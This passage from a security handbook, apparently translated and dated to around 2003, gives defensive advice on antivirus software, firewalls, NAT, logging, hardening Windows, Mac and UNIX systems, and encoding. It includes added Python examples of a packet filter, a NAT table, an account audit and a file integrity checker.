• If a virus, worm or Trojan is identified, the tool removes it or, if it cannot, tells you that the problem cannot be fixed; it then quarantines the damaged file and so prevents harm to the other parts of the file system.
Rule Twenty:
Antivirus software must be installed on every computer that is vulnerable to viruses, and it must be updated every day. The machine must also be given a full virus scan periodically.
Rule Twenty-One:
On computers that are not affected by viruses (such as Unix-based systems), make sure that outgoing e-mail does not contain a virus, so that the recipient is not harmed either.
Rule Twenty-Two:
Keep your operating systems and important applications up to date, and remember that virus scanners only check for viruses that attack files, whereas vulnerabilities in operating systems and applications may cause the system to be harmed in other ways.
A virus scanner with up-to-date virus signatures (a "signature" is a particular characteristic of a virus by which the scanner can identify the type of virus) is one of the most important parts of any network that can be connected to the Internet. Note that viruses for the UNIX environment have only recently begun to spread, whereas worms and Trojans for this environment have existed for some time.
As of late August 2003, one antivirus product for PCs and Macintosh (Norton antivirus) could identify approximately 65,000 different viruses. August 2003 was an interesting month for the release of malicious software, because many of the worms released that month exploited a very critical vulnerability in the Windows operating system (Blaster and SoBig were the most common of them). Microsoft had released a patch for it a month earlier, but few people had installed it, and for that reason the new worms were able to damage a great many machines and spread among them quickly, perhaps setting new records in the process. On the busiest day of that month, the Norton scanner added about 50 new virus signatures to its list of detectable viruses. By a month later that number had reached about 520.
Firewalls
A firewall examines all activity entering or leaving the network and, on the basis of the set of rules it holds, either lets traffic (that is, the information exchanged over the network) pass or stops it. A firewall can be installed as a program on the computer, or it can be a piece of equipment placed between the computer (or a group of computers) and its network connection. Sometimes the firewall is built into other equipment, such as routers. Firewalls of this kind are usually free and preinstalled, and they are present in many operating systems.
Rule Twenty-Three:
Every computer must be protected by a firewall, which can either be installed as software on each computer or be put in place as a hardware firewall for the whole local network.
To understand what a firewall does and how rules can be set to control it, you also need to grasp the concept of the TCP/IP protocol, the set of rules that governs all messages sent over the Internet. If you are familiar with TCP/IP you can move on to the next chapter; if you are not, first read Appendix 2 of this part. Note that even if you do not want to learn these details, you can still use a firewall. What follows is a brief summary of everything you need to know about TCP/IP:
• Machines connected to the Internet have an IP address of the form 12.222.103.43 which, as you can see, is made up of four separate numbers. The Internet uses this address to find the route for a message, and every computer states where its messages should be sent by giving a destination address in this form.
• On each machine, the different programs are identified by a port number (like telephone extension numbers in a large company: there is only one public telephone number, but each room has its own extension).
• The pieces of information sent to or from a computer are called packets.
• Ignore the words TCP and UDP in the discussion below, and do not worry much about missing the details.
Why do we need a firewall?
If your computer is not connected to a local network or to the Internet, you do not need a firewall. As soon as you connect to a network, there is a possibility that attackers will abuse your computer. For example:
• If you use file sharing, printer sharing or other computer services, your computer waits on particular ports (in the jargon, the computer is said to "listen" on that port). Although this lets you share your resources with another computer, it may also let another computer anywhere in the world see your information.
• If you are listening on the file-sharing ports, flaws may allow someone to send you a cleverly crafted message and use it to carry out malicious actions on your computer. Unfortunately, this kind of attack has now become very common.
• Even if you are not waiting for messages on any port, other computers can still send you large numbers of messages. Although all of them can be ignored, the messages can clog your network connection and prevent you from doing your work (in this case only hardware firewalls can help you).
• If, despite all your efforts, you are infected by a virus, worm or Trojan, all the information on the computer may be sent to the author of the malicious software. This includes the data and everything recorded on the victim's computer (including passwords).
How do firewalls work?
A firewall monitors every packet sent to your computer and checks whether it conflicts with the rules that have been set. If it does, the packet is blocked. In both software and hardware firewalls it is best to implement the following rules:
• Do not let any packet through on ports 135, 137, 139 and 445 TCP/UDP. These ports are used for the file sharing service and for other kinds of Windows services. By stopping these packets you can be sure that nobody can connect to your computer over the Internet to use these services.
• Do not let any packet through on ports 135, 137, 139 and 445 TCP/UDP unless its source IP address belongs to one of the computers whose services you want to use.
• You can give the firewall a list of trusted computers that will not harm the network, so that only trusted computers can connect to you. You can still connect to other computers, such as web servers on the Internet, but to do so you must be the one who initiates the connection.
Software firewalls consume the computer's own resources, but they have the advantage that they do not look only at the content of the information (together with the addresses and ports of its sender or receiver); they can also check which program sent the message. If an unauthorized program has opened a connection with your computer, the firewall can ask for your permission before letting it through. A hardware firewall cannot tell which program was used to send a message; but because it is a separate piece of hardware, it does not slow the computer down.
If you have a hardware or software firewall, you must keep it up to date at all times, as with any other security equipment. Attackers are very inventive, so it is very important that the tools you use to protect your system are current.
Private address spaces
The Internet was originally designed so that every computer or device on it had its own address and any computer could therefore communicate with any other. Today, for many reasons, universal connectivity at this level is not very desirable. There are two main reasons for this:
• Sometimes you want to keep a group of computers apart from the rest so that they cannot communicate directly with other computers on the Internet. This is the case for the computers of some public and private organizations.
• Because IP addresses are allocated across the Internet as a whole, your organization may not have enough IP addresses to give one to every machine. This problem is common in developing countries, where the national Internet came into being several years after the communication networks of the developed countries had been set up.
There are particular IP addresses that are not used on the Internet. These addresses are called "private address spaces" and can be used in the two cases just mentioned. Because computers that use private address spaces do not communicate directly with the Internet, they do not need unique addresses. Different organizations may use the same set of addresses, but none of them can see the others, so these identical addresses cause no problem.
There are two ways in which a computer that has a private address can communicate with the Internet:
• Proxy servers
A proxy server is a special kind of firewall. It has an address in the private address space, but it also has a second connection and address for connecting to the Internet. When a user wants to reach the Internet from a machine whose address is in the private space, the machine sends its message to the proxy server and asks it to deliver the message to the intended destination on the Internet. The proxy server keeps the request after sending it out over the Internet and, when the reply comes back, returns it to the requesting machine.
Proxy servers can also be used with ordinary IP addresses. They are used to control the kind of Internet traffic that passes through, or to ease communication between users and the network. A web proxy server keeps a copy of the pages that have been requested and, if another user asks for the same page, sends that user the stored copy; this reduces the Internet bandwidth required. This mechanism is called caching.
• NAT (Network Address Translation)
NAT sits between the local network and the Internet and, like a proxy server, is connected both to the Internet and to the local network in which private IP addresses are used. When a message is sent from the local network to the Internet through NAT, NAT sends it using its own IP address and makes it appear that the message came from a port that is not currently in use; when the reply is received, it is passed back to the original computer on the local network. NAT works like a proxy server, but it is used for all kinds of traffic (not just web traffic) and it does not use caching.
Proxy servers and NAT both act like firewalls and protect the machines in private address spaces against various kinds of outside attack.
Remote access, management and administration tools
Remote access tools, remote management tools and remote administration tools let you control your computer from a distance, over a telephone line or the Internet. When you connect to your computer in this way, it is as if you were sitting at its keyboard.
Rule Twenty-Four:
If you use remote access facilities to control computers, make sure that they are adequately secured (with suitable usernames and passwords), so that attackers cannot use these tools against you.
Remote access tools have many important uses. Among them are the following:
• When you do not have physical access to your office computer, they let you use it. In this way you can reach the data, applications and network services of your workplace.
• They let you show your computer to a specialist for examination without bringing the specialist to your workplace.
• Many people can use applications that are installed on only one machine.
• System support staff can use them to manage several servers easily.
Remote access tools give attackers the ability to do all of these things as well. In fact, there is little functional difference between the remote access tools used for the purposes above (such as pcAnywhere) and the backdoors installed by Trojans (such as Back Orifice or NetBus).
Malware detectors
Suppose that you keep your software up to date, scan for viruses and check the files you receive, use strong usernames and passwords, and also use a suitable firewall to protect your system. If you are then asked whether all of this makes you completely safe, the answer "yes" still cannot be given with one hundred percent confidence. There is always a chance that you will be harmed by a flaw before a fix for it has been released. You may also, from time to time, do something that cannot be considered completely safe.
"Malware detectors" are programs that examine your computer for suspicious programs, regardless of how they came to be installed. Their function sometimes overlaps with that of virus scanners, because both identify malicious software on disk and check that key system programs have not been secretly altered.
These detectors check browser plug-ins and add-ons and identify anything that harms your system or violates privacy rules. Some of these programs also include tools for removing the malware they identify.
Event logging
Event log files are a useful tool that ensures the security of your computer, but they usually receive little attention. Log files are kept on disk, and programs can write messages to them. A message is usually written when an event occurs or a problem arises.
Rule Twenty-Five:
Event logging for system functions and applications must be properly enabled.
Examples of events that can be logged are:
• the computer was switched on;
• someone logged in to the system;
• someone tried to log in but the password was wrong;
• an e-mail message was received;
• an e-mail message was about to be sent but the connection was lost;
• a large number of errors occurred on the disk (or the network connection);
• the firewall identified an unauthorized connection and blocked it;
• the virus scanner automatically downloaded a new set of virus signatures;
• a virus scanner checked all the files on the system and identified a virus.
Depending on the program and the system it runs on, log files may be deleted once they grow large, or a new log file may be created at intervals while the older files are kept for later examination (usually part of the log file name contains a date).
In general there is a separate log file for each system and each application. Sometimes you can read the file with a text editor, and sometimes you will need special tools to read and format it.
Logs are very useful and in general should be enabled. At the same time, take care not to enable them for routine, everyday activities, because the system has to spend a great deal of time writing and examining them, and they also take up disk space.
If you know what the detailed entries in the log files mean, you should review them periodically to see whether anything unusual has happened. If you do not, the logs should be kept in such a way that, if something abnormal does occur, they can give guidance for working out more precisely what happened.
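The filtering rules listed under "How do firewalls work?" and the advice above to review logs periodically can be tried together. The following Python code is an added example, not part of the handbook: it blocks ports 135, 137, 139 and 445 except from a trusted list, admits other inbound packets only as replies to connections this computer started, writes a log line for every block, and then summarizes the log. The class and function names, the log format, the date and all addresses are assumptions made for the illustration, and connections are remembered without any timeout.

```python
from collections import Counter
from dataclasses import dataclass

# Ports named in the filtering rules (Windows file sharing and related services).
SHARING_PORTS = {135, 137, 139, 445}


@dataclass(frozen=True)
class Packet:
    direction: str  # "out" = sent by this computer, "in" = arriving from the network
    proto: str      # "tcp" or "udp"
    src: str
    sport: int
    dst: str
    dport: int


class PersonalFirewall:
    def __init__(self, trusted_hosts):
        self.trusted = set(trusted_hosts)  # the "list of trusted computers"
        self.initiated = set()             # connections this computer started
        self.log = []                      # stands in for the firewall's log file

    def allow(self, pkt, when):
        """Return True to pass the packet, False to block it (and log the block)."""
        if pkt.direction == "out":
            # Remember the conversation so that the reply can come back in.
            self.initiated.add((pkt.proto, pkt.dst, pkt.dport, pkt.sport))
            return True
        if pkt.src in self.trusted:
            return True
        is_reply = (pkt.proto, pkt.src, pkt.sport, pkt.dport) in self.initiated
        if is_reply and pkt.dport not in SHARING_PORTS:
            return True
        reason = "sharing-port" if pkt.dport in SHARING_PORTS else "unsolicited"
        self.log.append(
            f"{when} BLOCK {reason} {pkt.proto} "
            f"{pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport}"
        )
        return False


def review(log_lines, threshold=3):
    """Periodic log review: sources that were blocked at least `threshold` times."""
    blocked = Counter()
    for line in log_lines:
        fields = line.split()
        if len(fields) == 7 and fields[1] == "BLOCK":
            source_ip = fields[4].rsplit(":", 1)[0]
            blocked[source_ip] += 1
    return {ip: n for ip, n in blocked.items() if n >= threshold}


# Constructed traffic; every address below is a placeholder chosen for this example.
ME, FRIEND = "192.168.1.10", "192.168.1.20"
WEB, STRANGER = "198.51.100.7", "203.0.113.5"
SAMPLE = [
    ("10:00:01", Packet("out", "tcp", ME, 50000, WEB, 80)),      # we open a web page
    ("10:00:02", Packet("in", "tcp", WEB, 80, ME, 50000)),       # the reply to it
    ("10:00:05", Packet("in", "tcp", STRANGER, 4444, ME, 445)),  # file-sharing port
    ("10:00:06", Packet("in", "udp", STRANGER, 137, ME, 137)),
    ("10:00:07", Packet("in", "tcp", FRIEND, 1025, ME, 139)),    # trusted computer
    ("10:00:09", Packet("in", "tcp", STRANGER, 4445, ME, 135)),
    ("10:00:12", Packet("in", "tcp", WEB, 80, ME, 50001)),       # nobody asked for this
]


def run_firewall_sample():
    fw = PersonalFirewall(trusted_hosts=[FRIEND])
    decisions = [fw.allow(pkt, f"2003-08-12T{clock}") for clock, pkt in SAMPLE]
    return decisions, fw.log, review(fw.log)


if __name__ == "__main__":
    decisions, log, repeat_sources = run_firewall_sample()
    print(decisions)
    print("\n".join(log))
    print(repeat_sources)
```

The last sample packet comes from a server the computer had contacted, but on a port pair it never used, so it is treated as unsolicited; only the exact reply is let in.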
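The NAT behaviour described under "Private address spaces" earlier in this chapter (sending with the NAT device's own address from an unused port, and passing the reply back to the original computer) can be seen in a small translation table. This Python code is an added example, not part of the handbook; the class name, the port pool and the addresses are assumptions, the private ranges are those reserved by RFC 1918, and the table matches replies on the public port only.

```python
import ipaddress

# Private address blocks reserved by RFC 1918; they are not routed on the Internet.
PRIVATE_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_private(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in PRIVATE_NETS)


class Nat:
    """Port-translating NAT with one public address and a small pool of ports."""

    def __init__(self, public_ip, ports=range(40000, 40003)):
        self.public_ip = public_ip
        self.free_ports = list(ports)
        self.out_map = {}   # (proto, private_ip, private_port) -> public_port
        self.back_map = {}  # (proto, public_port) -> (private_ip, private_port)

    def outbound(self, proto, src_ip, src_port, dst_ip, dst_port):
        """Rewrite a packet leaving the local network; returns the new header."""
        if not is_private(src_ip):
            raise ValueError(f"{src_ip} is not a private address")
        key = (proto, src_ip, src_port)
        if key not in self.out_map:
            if not self.free_ports:
                raise RuntimeError("NAT port pool exhausted")
            public_port = self.free_ports.pop(0)  # a port that is not in use
            self.out_map[key] = public_port
            self.back_map[(proto, public_port)] = (src_ip, src_port)
        return (self.public_ip, self.out_map[key], dst_ip, dst_port)

    def inbound(self, proto, src_ip, src_port, dst_port):
        """Rewrite a packet arriving at the public address, or None to drop it."""
        owner = self.back_map.get((proto, dst_port))
        if owner is None:
            return None  # no inside computer started this conversation
        return (src_ip, src_port, owner[0], owner[1])


def run_nat_sample():
    nat = Nat("198.51.100.1")  # constructed public address of the NAT device
    # Two inside computers happen to choose the same source port.
    a = nat.outbound("tcp", "192.168.0.5", 1025, "203.0.113.80", 80)
    b = nat.outbound("tcp", "192.168.0.6", 1025, "203.0.113.80", 80)
    reply_to_b = nat.inbound("tcp", "203.0.113.80", 80, b[1])
    unsolicited = nat.inbound("tcp", "203.0.113.99", 4444, 445)
    return a, b, reply_to_b, unsolicited


if __name__ == "__main__":
    for result in run_nat_sample():
        print(result)
```

The unsolicited packet is dropped because no table entry exists for it, which is the sense in which the text says NAT protects machines in a private address space.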
‫ﻓﺼﻞ ﻫﺸﺘﻢ‬
‫ﻧﻜﺎﺕ ﻭﻳﮋﺓ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ‬
Windows-Based Personal Computers

Strengths and Weaknesses

The Windows operating system on an Intel x86 processor (or its equivalents) is the most widespread computer system designed to date. The capabilities of this operating system and its application software are very attractive from a user's point of view, and a large amount of commercial software, shareware and free software is available for it. Although, as with any other system, true experts are hard to find here too, there are many specialists with an acceptable level of knowledge for working with these systems. Many competitors also compete on the hardware side, which has led to product variety and relatively low prices.

All of the material in this book applies to Windows systems, and users who are concerned about security should take all of the recommendations given seriously.

From a security standpoint, Windows is not in a particularly good position. The operating system kernel was not designed with the security of network communications in mind, and although many of these issues have been addressed in its newer versions (Windows 2000, Windows XP, ...), the necessary level of safety is still lacking, and the recent changes have been of little help to users of older systems. Until recently Microsoft paid little attention to security. That situation has now changed, particularly as the company has turned its attention to the flaws in multimedia software and the other vulnerabilities of its operating systems.

The extended functionality of systems and software usually raises the cost of securing them. In many cases, to make the tools easier for novice users, systems have been given several subsystems and a great many features, which has made them vulnerable. Because of the multitude of vulnerabilities and the number of computers in use, tens of thousands of Windows-based personal computers became prime targets for programmers who released malware such as viruses, worms and Trojans. The graphical user interfaces in Windows are very user-friendly, and millions of people with little technical knowledge are now able to use them. This user-oriented approach, combined with the vulnerabilities mentioned, makes Windows-based systems prone to security problems.

How to Protect Ourselves

Software Release

If you have sufficient bandwidth, use the Microsoft update site (http://windowsupdate.microsoft.com) to keep your operating system up to date with the latest Service Packs. Otherwise, apply the security patches published for updating Windows (these patches take up less bandwidth than Service Packs). If updating through the Microsoft update site is not possible for you, you can obtain the update packages from the Microsoft download center (http://www.microsoft.com/downloads). Your ISP or other service providers may be able to download the published updates and distribute them on CD. Although this requires considerable resources, a tool for managing Windows updates, in the form of a service called Software Update Services for the Windows 2000 operating system, is available at the following site:
http://www.microsoft.com/windows2000/windowsupdate/sus/
User Accounts

On Windows NT, Windows 2000 and Windows XP systems, which support multi-user operation, you must make sure that no unnecessary user accounts have been created. In addition, make sure that all users have chosen a suitable password, as explained in Chapter 3 of this part. Users should be given only the privileges they need. For example, even if a machine is administered by its own primary user, that user should not use administrative privileges for routine, everyday work.

File Sharing

If you do not use the file sharing or print sharing features, make sure they are disabled. The steps for doing this are available in Windows Help and on the Microsoft support site. Search for the phrase "disable file sharing xx", where xx is the version of your operating system, for example XP or 2000. If you do use file sharing, make sure that no unnecessary privileges are enabled on it.

File System

The FAT and FAT32 file systems used in Windows are not completely secure, especially if you use file sharing. If files are accessed over the network, the NTFS file system should be used where possible. Note that where your computer can be booted with more than one operating system, or where you need to access the hard disk of another operating system, you cannot use NTFS.

System Services

On some systems all network capabilities are enabled so that communication between computers can be established easily. If you have no network in your company, disable the services that are not used.

Firewall

Install a hardware or software firewall on your system. Free versions of this software are available. Keep the firewall up to date. Make sure the firewall is configured so that it alerts you whenever anything unusual happens.

Antivirus

Install antivirus software on your machine as well. If you cannot find a free version, you will have to pay for a commercial one. Some vendors insist on daily updates of their antivirus products and others recommend weekly updates. Naturally, the more up to date your software is, the better it can protect the system.

Malware Detectors

There are programs that scan the system for various kinds of malicious software, such as:
• Pest Patrol (http://www.pestpatrol.com)
• Lavasoft (http://lavasoftusa.com/software/adawareplus/)
• SpybotSD (http://www.safer-networking.org)
All of the above programs are free and detect different kinds of malicious software on the system.
Security Check Summary

If you are a non-technical user and there is no organization to help you, you can take a look at Microsoft's suggestions for home users:
http://www.microsoft.com/security/home
http://www.microsoft.com/protect/
If you are an information technology specialist, you can use this site:
http://www.microsoft.com/technet/security
If you have a new system, you can install and run MBSA (Microsoft Baseline Security Analyzer) on it, which is designed to support Windows 2000 and Windows XP systems.

Macintosh Computers

Strengths and Weaknesses

Apple Macintosh computers and their operating system are less susceptible to security problems than Windows personal computers. Moreover, because Mac machines have fewer users than personal computers, attackers show less interest in sabotaging them. Perhaps their greatest vulnerability is that Mac users imagine they are always safe and will never be harassed by anyone. The MacOS systems that preceded MacOS X had a more suitable operating system. MacOS X is based on FreeBSD UNIX and should be regarded as a particular UNIX system designed with proper security considerations (this is covered in the next section, which deals with UNIX). Numerous system services are built into the core of MacOS X, but all of them are disabled.

How to Protect Ourselves

Software Release

Make sure that you have applied all patches for protecting the system. Go to http://www.apple.com and click Support. As with Windows systems, here too there is a chance that your unpatched system will be compromised after only a few hours or days, especially if it has a permanent network connection.

User Accounts

Make sure that all user accounts that are not needed have been disabled or deleted. In particular, check that the guest account is not enabled without a password. Restrict administrative privileges for the accounts you use most, and do not use the administrator account for everyday tasks that can be done without administrative privileges.

File Sharing

If you do not use this feature, disable it. Otherwise, make sure that the privileges assigned are at the lowest possible level.

Services

Disable services that are not needed. If you enable them temporarily, remember to disable them all again once the work is finished.

New Application Software

New network-related applications (especially those designed for UNIX) may be vulnerable on systems designed before MacOS X. If you have installed such software, keep this in mind.
Firewall

Install a hardware or software firewall on your system and keep it up to date. Make sure the firewall is configured so that it alerts you whenever anything unusual happens.

Antivirus

Install antivirus software on your machine as well. If you cannot find a free version, you will have to pay for a commercial one. Some vendors insist on daily updates of their antivirus products and others recommend weekly updates. Naturally, the more up to date your software is, the better it can protect the system.
UNIX, Linux, and Similar Systems

Strengths and Weaknesses

From their beginnings, Unix systems were used in computer science and physics environments as workstations and servers (both for system services and for multi-user computing), and over the past decade they have to some extent overtaken Windows and Macintosh systems, which in other environments were single-user workstations. With the growing popularity of Linux this trend spread, because on the one hand the system was very interesting and attractive, and on the other hand, unlike Windows, its source code was made freely available to the public. This attracted more attention in developing countries than in developed ones, because the cost of acquiring software in developing countries is much higher relative to the average income level. Among the strengths of UNIX are its flexibility and the software that users and companies have produced for it over the years.

Unfortunately, the power and flexibility of UNIX have not been accompanied by user-friendliness (from a novice user's point of view). As a result, when these systems are used as workstations by users who are not UNIX specialists, strong staff are needed to support them. In any case, the foundation of this system is still complex, and a novice, inexperienced user is quite likely to leave entry points open for a security breach. Although UNIX systems are relatively free of viruses, they are susceptible to the latest worms and Trojans released, and so these still count among their potential problems.
How to Protect Ourselves

All of the topics mentioned in the previous 7 chapters also hold for UNIX, Linux and similar systems, and if you want to make your computer relatively secure you must attend to them. This section focuses on single-user workstations. Those responsible for servers should read Part Five of this book.

Different Kinds of UNIX

Because there are various UNIX-like operating systems, many vendors have their own pre-installed security mechanisms. It is therefore very important to read the practical guide for the version of Unix you use. The names of several useful books, websites and mailing lists devoted to Unix security are given in the appendices of the book.

Software Release

Software must be kept up to date, and all security patches must be installed on it promptly. The details of where to obtain an update package and how to apply it differ from system to system.
User Accounts

The root user (uid 0) has the highest level of access and can usually change every aspect of the system. For this reason, protecting the root account and the processes that can be run by this account is one of the most important aspects of UNIX security. Avoid using the root account for everyday activities and, for added assurance, disable the ability to log in to the system with the root account. When you must use this account, use the superuser command (su, or alternatives such as sudo) to switch the account in use to the root account.

If you have more than one user on the system, use access control lists to restrict users' access.

Wherever possible, use network services with an account other than the root account.

Never unpack or compile new software with the root account. Software is usually compiled in an environment entered with chroot, in order to protect you against various kinds of Trojans.

Mounting Disks That Are Used Remotely

If you use various remote access methods to access a disk remotely (from personal computers or UNIX systems), set suitable passwords for this and, where possible, restrict access to the files that the software needs to only what is required.

System Services

Many UNIX machines have extensive system services, such as an FTP server, a web server and a mail server. In many cases these services are enabled by default. Disable all network-based services that are not used. Some people think that because these services exist they ought to be used, even if they lack the technical expertise to manage their security. This is a big mistake, and these services should not be set up on users' workstations without a compelling reason and sufficient technical support.

Many network services are started by the inetd or xinetd command. Review the configuration files used by this daemon and disable every service you do not need. Other network services that start at system boot are located in files under /etc/init.d or /etc/rc*.d, or in /etc/rc and /etc/rc.local. Pay particular attention to services that may disclose information about the system or its users to others, such as fingerd.

If you have set up an anonymous FTP service, be sure to keep it up to date. Never exchange the /etc/passwd file in the FTP environment. Make sure that the root, uucp and bin accounts, and other accounts that do not belong to a particular user, are present in the /etc/ftpusers file, which contains the list of users who may not use FTP. Watch the directory permissions and ownership in the FTP environment. Prevent downloads through incoming paths and uploads through outgoing paths, and finally, review the logs of your FTP service regularly.
Firewall

Every UNIX system should run its own host-based firewall for packet filtering. Use the vendor's documentation to determine whether your system has a firewall and, if so, how it can be used for this purpose. Firewall configuration tools typically include ipfw, ipchains and iptables. These firewalls should be configured so that by default they block all packets and only allow through those destined for services you want.

Default User Accounts

Many Unix systems have several default user accounts, such as bin, daemon, uucp and so on, that are used for separate processes or for file ownership. Make sure that the encrypted passwords of all these accounts begin with the "*" character, so that no password can be used to access them. It is enough for the root account to have a valid password; no one needs to be able to log in to the other accounts (although, if necessary, the root account can gain access to the other accounts using the su command).
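The two account checks described above (default accounts whose password field does not start with "*", and non-personal accounts missing from /etc/ftpusers) can be scripted. This is an added example, not part of the handbook; the file contents are constructed samples, and the uid cut-off for "system account" and the acceptance of "!" as a second locked marker are assumptions.

```python
# Constructed sample files in passwd(5) / shadow(5) / ftpusers layout.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
toor:x:0:0:spare admin:/root:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/sh
"""

SAMPLE_SHADOW = """\
root:$6$constructedsalt$constructedhash:19000:0:99999:7:::
bin:*:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
uucp:$1$constructed$constructedhash:19000:0:99999:7:::
toor::19000:0:99999:7:::
alice:$6$constructedsalt$constructedhash:19000:0:99999:7:::
"""

SAMPLE_FTPUSERS = """\
# accounts that may NOT log in over FTP
root
bin
"""

# The text names "*"; "!" is the other marker shadow(5) treats as unusable.
LOCKED_PREFIXES = ("*", "!")


def parse_colon_file(text, min_fields):
    """Split a colon-separated account file into rows, skipping blanks and comments."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < min_fields:
            raise ValueError(f"malformed line: {line!r}")
        rows.append(fields)
    return rows


def audit_accounts(passwd_text, shadow_text, ftpusers_text, system_uid_max=999):
    """Return (account, finding) pairs, ordered by account name.

    system_uid_max is an assumption: accounts at or below it are treated as
    non-personal accounts such as bin, daemon and uucp.
    """
    uids = {row[0]: int(row[2]) for row in parse_colon_file(passwd_text, 7)}
    fields = {row[0]: row[1] for row in parse_colon_file(shadow_text, 2)}
    ftp_denied = {
        line.strip()
        for line in ftpusers_text.splitlines()
        if line.strip() and not line.lstrip().startswith("#")
    }
    findings = []
    for name, uid in sorted(uids.items()):
        if uid == 0 and name != "root":
            findings.append((name, "uid 0 but not root"))
        if uid > system_uid_max:
            continue  # personal account: outside the scope of these checks
        if name != "root":  # root is the one system account that keeps a password
            field = fields.get(name)
            if field is None:
                findings.append((name, "no shadow entry"))
            elif field == "":
                findings.append((name, "empty password field"))
            elif not field.startswith(LOCKED_PREFIXES):
                findings.append((name, "password login possible"))
        if name not in ftp_denied:
            findings.append((name, "not listed in ftpusers"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW, SAMPLE_FTPUSERS):
        print(f"{account}: {finding}")
```

On a real system the three texts would be read from /etc/passwd, /etc/shadow and /etc/ftpusers, which requires read access to the shadow file.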
Malware Detectors

There are many tools for revealing malicious software to the Unix administrator. One of the oldest is Tripwire, which checks whether important system software and other critical files have been covertly modified.
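The kind of check the text attributes to Tripwire can be illustrated with a small baseline-and-compare script. This is an added example, not Tripwire's own code or file format; it uses SHA-256 digests and a JSON baseline file, both of which are choices made for this sketch.

```python
import hashlib
import json
from pathlib import Path


def hash_file(path, chunk_size=65536):
    """SHA-256 of one file, read in chunks so large files do not fill memory."""
    digest = hashlib.sha256()
    with Path(path).open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root):
    """Map every regular file under root (relative path) to its digest."""
    root = Path(root)
    return {
        path.relative_to(root).as_posix(): hash_file(path)
        for path in sorted(root.rglob("*"))
        if path.is_file() and not path.is_symlink()
    }


def save_baseline(baseline, destination):
    # The baseline is only useful if an intruder cannot rewrite it, so it
    # belongs on read-only or offline media, not next to the files it covers.
    Path(destination).write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(source):
    return json.loads(Path(source).read_text())


def compare(baseline, current):
    """Report files whose content changed, appeared or disappeared."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


if __name__ == "__main__":
    import sys

    # Usage: script.py init <dir> <baseline.json>  |  script.py check <dir> <baseline.json>
    mode, directory, baseline_file = sys.argv[1:4]
    if mode == "init":
        save_baseline(build_baseline(directory), baseline_file)
    else:
        report = compare(load_baseline(baseline_file), build_baseline(directory))
        print(json.dumps(report, indent=2))
        sys.exit(1 if any(report.values()) else 0)
```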
Appendix 1
Introduction to Encoding and Encryption

Encoding and encryption are techniques that transform strings of characters into another format and form. In the computer world, encoding is a transformation that changes the appearance of a message so that the result meets particular criteria; encryption is also a kind of transformation, one used to hide the content of the message.

Encoding

Encoding changes the format of the subject matter in order to meet certain desired criteria. The process is reversible, so that the encoded form can later be decoded to convert it back to its original form.

The Encoding Process

Suppose you want to send a message that is an ordinary English sentence:
Security is important.
But there is a restriction on sending: you can only send the decimal digits 0, 1, 2, 3, 4, 5, 6, 7, 8, 9. So we need a mapping function that can convert what we want to send into decimal numbers and, after transmission, can also restore it to its previous state.

For this purpose we use a set of simple rules:
A is replaced by 01;
B is replaced by 02;
C is replaced by 03;
D is replaced by 04;
...
X is replaced by 24;
Y is replaced by 25;
Z is replaced by 26;
a space is replaced by 27;
and a period is replaced by 28.

Take the original sentence and replace each letter with its assigned code:
put 19 in place of S;
put 05 in place of E;
put 03 in place of C; and so on.

Now we can send the string like this:
19050321180920252709192709131615182001142028
If we put spaces between the digits it becomes more readable:
19 05 03 21 18 09 20 25 27 09 19 27 09 13 16 15 18 20 01 14 20 28.

When the message is received, the recipient restores it to its original state:
19 is replaced by S;
05 is replaced by E;
03 is replaced by C, and this continues until the original sentence is obtained.

Uses of Encoding

The main use of encoding that we will deal with here is in transferring e-mail attachments. E-mail was originally designed for sending text in English, and the basis of this design was the ASCII code, which had 128 unique characters. This number of codes was used to represent the 26 letters of the English alphabet in lower and upper case, the 10 digits, some other symbols such as the comma, period and bracket, and a number of control keys such as Tab and End.

But many languages have more letters than English. On the other hand, programs, word-processing files, pictures and other kinds of files are made up of 8-bit bytes, which give a total of 256 unique characters, and none of these can be sent by e-mail.
To solve this problem the concept of attachments came about, in which a file sent along with an e-mail is first encoded so that its content takes the form of standard ASCII characters. This process is similar to the one by which we were able to encode that sentence using only numbers. As in the previous example, here too the encoded message is longer than the original; but it can be transferred without any particular problem and, once received, be decoded and restored to its original form.

Unicode

Unicode is an encoding method for all the characters used in common languages, which computers can use in a uniform way. Further details agreed in the Unicode Consortium (http://www.unicode.org) are summarized below:

Computers fundamentally deal with numbers. They store letters and other symbols by assigning a number to each one. Before Unicode there were hundreds of different encoding systems for these conversions, but none of them supported enough letters and symbols; the European Union alone, for example, needed several different encodings to cover all European languages. Even for a single language such as English, one encoding was not enough for all the letters, punctuation and technical symbols.

Different encoding systems were also incompatible with one another; that is, two different encoding systems might use the same number for two different characters, or use two different numbers for the same character. Every computer (especially servers) has to support many different encoding systems. Whenever data is exchanged between different encoding systems it may be corrupted. Unicode came to solve all of these problems.

Unicode assigns a separate number to every character, no matter what platform, program or language is in use. The Unicode standard was finalized under the leadership of companies such as Apple, HP, IBM, JustSystem, Microsoft, Oracle, SAP, Sun, Sybase, Unisys and others, and is a fixed standard across all platforms.

Encryption

Encryption is like encoding in that, in the process, text or subject matter is converted into another format. The aim is to hide the content of the message.

There are three different encryption methods:
• Symmetric encryption
• Public key encryption
• One-way encryption using a hash

Symmetric Encryption

